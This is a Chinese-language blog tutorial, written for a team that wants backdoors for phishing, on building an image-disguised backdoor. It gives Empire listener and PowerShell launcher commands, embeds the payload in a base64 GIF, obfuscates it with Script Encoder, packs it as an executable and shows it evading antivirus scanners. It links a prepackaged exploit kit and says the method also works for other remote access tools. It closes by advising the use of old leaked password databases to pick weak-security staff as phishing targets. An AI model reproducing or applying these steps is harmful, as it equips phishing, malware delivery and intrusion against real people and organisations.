基于很多攻击的框架,和出色的backdoor程序,现在的后门已经不仅仅局限与tcpip了,今天分享的东西算不算干货呢?就靠读者朋友们来定义了。
photo-1518351330216-a38c8ab14640.jpg

最近团队的web突破口老跟我求后门玩钓鱼,就来写这么一篇文章。

觉得文章字太长的直接传送门看视频:腾讯视频传送门 微博传送门

基于很多攻击的框架,和出色的backdoor程序,现在的后门已经不仅仅局限与tcp/ip了,今天分享的东西算不算干货呢?就靠读者朋友们来定义了。

玩攻击仪式感很重要,招招有理招招有据,能生信心,所以我把这套流程叫做“永生之火”,接下来开始尝试吧。

[练手平台]:

WK(win+kali)

[工具准备]:

gif/jpg/png任意图片一张

Empire下载地址:https://github.com/EmpireProject/Empire

Script Encoder

[利用装备包]:

https://github.com/flagellantX/0dayplay(下载压缩包,都打包好了)

[彩蛋]:老朋友都知道我肯定会附送彩蛋,这个彩蛋是针对Webhacker或者是渗透测试的纯初学者或者还不知道怎么入门的朋友们推荐的,当然你们知道我对这块是不懂的,资料是web狗给我的,内容是澳洲的Web安全专家Troy Hunt的公开课

言归正传,先来到今天的技能点添加环节:

Let’s Go!

1.jpgCommand:

listeners

use listener http
set Name flagellantX

execute

launcher powershell flagellantX
2.jpg

接着我们打开这个网站,将我们选好的gif动图转换成base64

3.jpg
4.jpg

接着将base64的编码值复制到我们的利用代码段位置

6.jpg
5.jpg

紧接着我们生成一下powershell(launcher powershell flagellantX),并将powershell复制到利用代码的代码段:

8.jpg
9.jpg

将所有东西全部copy到Script Encoder:

10.jpg

将右边框Convert好的代码所有复制,并打包成一个可执行的文件:

11.jpg
12.jpg

到了这一步我们今天任务完成了80%了,我们可以上一下大卫士扫一扫

我机子里面还有绒儿,一起扫一下看看,欧98k,服毒吧:

13.jpg

打开会是这样:

15.jpg
14.jpg

关于empire的后渗透利用的话,fb有很多文章,大家搜一下了解一下我这边就打住了。

那么这招利用到传统的RAT可以实现绕过吗?

答案是,欧98k,过程差不多,不赘述了:

16.jpg

题外话:

问:为什么每次都是它?

答:谁?…

问:为什么每次都是大卫士!!

答:因为它云上传很厉害啊。

问:这招分享了会不会像之前的鱼竿钓鱼那样被杀?

答:这个姿势我还是比较有自信的,不过再好的后门使用认数达到定量也会变成报毒后门。

问:干!那怎么办???!

答:绕过的办法很多,多学多找多探讨。

______________________________________________________________________________________________

一点想法,微博朋友私信交流的关于隐私数据库就是通常说的社工裤,有人说其实密码一改就算打到人,但是觉得可能那一个T的数据就没有价值了(密码不对),那么它的实战价值究竟在何处呢?

其实如果我在分析的话,就算一个裤子很老,这个数据也是可以利用的。如果对组织或者企业点对点渗透,而且网上有一个老裤子,我肯定会下载下来,把弱密码人群罗列出来,因为很简单,他/她既然对密码安全没什么敏感,那么下次修改的密码也不会太复杂,然后换一个角度思考,不从账号密码考虑,他/她的安全意识肯定比别人要低(123456肯定弱于iloveyou1234!),那么把他/她作为钓鱼目标,成功率是不是就高多了?这是我一点看法。

_________________________________________________________________________________________________

Eggs:

下载地址

From:

1.jpg